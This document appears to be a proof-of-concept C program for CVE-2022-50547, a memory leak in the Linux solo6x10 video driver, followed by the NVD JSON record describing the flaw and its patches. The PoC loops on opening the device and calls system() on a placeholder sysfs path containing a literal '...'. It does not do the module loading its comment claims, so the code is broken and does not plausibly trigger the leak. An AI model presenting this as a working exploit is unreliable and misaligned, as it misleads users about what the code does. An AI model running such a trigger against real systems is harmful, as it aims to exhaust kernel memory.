CVE-2022-50547

/* CVE-2022-50547 PoC - Trigger memory leak in solo6x10 driver * This PoC attempts to trigger the memory leak by repeatedly * loading/unloading the solo6x10 module to cause device_register() failures */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/types.h> #include <fcntl.h> #define SOLO6X10_DEVICE_PATH "/dev/solo6x10" #define ITERATIONS 1000 int main(int argc, char *argv[]) { int i; int fd; printf("CVE-2022-50547 PoC - solo6x10 memory leak\n"); printf("Attempting to trigger memory leak via device_register() error path\n"); for (i = 0; i < ITERATIONS; i++) { // Attempt to open solo6x10 device to trigger initialization fd = open(SOLO6X10_DEVICE_PATH, O_RDWR); if (fd >= 0) { close(fd); } // Trigger sysfs initialization repeatedly // This may cause device_register() to fail in certain conditions system("echo 1 > /sys/.../solo6x10_attr 2>/dev/null"); if (i % 100 == 0) { printf("Iteration %d/%d completed\n", i, ITERATIONS); } } printf("PoC execution completed. Check kernel memory usage.\n"); return 0; }

{"cve": {"id": "CVE-2022-50547", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:39.353", "lastModified": "2026-02-26T23:17:30.507", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: solo6x10: fix possible memory leak in solo_sysfs_init()\n\nIf device_register() returns error in solo_sysfs_init(), the\nname allocated by dev_set_name() need be freed. As comment of\ndevice_register() says, it should use put_device() to give up\nthe reference in the error path. So fix this by calling\nput_device(), then the name can be freed in kobject_cleanup()."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.10", "versionEndExcluding": "4.9.337", "matchCriteriaId": "8B6EB2C4-027B-4CF6-8C18-3DF97EB4AD1A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.10", "versionEndExcluding": "4.14.303", "matchCriteriaId": "1E7450AD-4739-46F0-B81B-C02E7B35A97B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15", "versionEndExcluding": "4.19.270", "matchCriteriaId": "AE8904A3-99BE-4E49-9682-1F90A6373F4F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.229", "matchCriteriaId": "A0C0D95E-414A-445E-941B-3EF6A4D3A093"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.163", "matchCriteriaId": "D05D31FC-BD74-4F9E-B1D8-9CED62BE6F65"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.86", "matchCriteriaId": "47237296-55D1-4ED4-8075-D00FC85A61EE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.0.16", "matchCriteriaId": "C720A569-3D93-4D77-95F6-E2B3A3267D9F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1", "versionEndExcluding": "6.1.2", "matchCriteriaId": "77239F4B-6BB2-4B9E-A654-36A52396116C"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/49060c0da57a381563e482e331dc9d4c3725b41b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7b02c50d3978840781808e13bc13137fb81286b5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7cf71bbe5d2ee12613f6e278888f5fc9c5c0cc2b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7f5866dd96d95b74e439f6ee17b8abd8195179fb", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/83d4b1ae98a47a739fa5241300b86eb1110d5d63", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/9416861170ba0da8ddb0f4fd2d28334f0ed3b9c2", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/963729538674be4cb8fa292529ecf32de0d6c6dd", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b61509093e1af69e336a094d439b8e1137cb40d8", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d6db105bcfbdbbbd484e788a0ddf8140a4a8c486", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}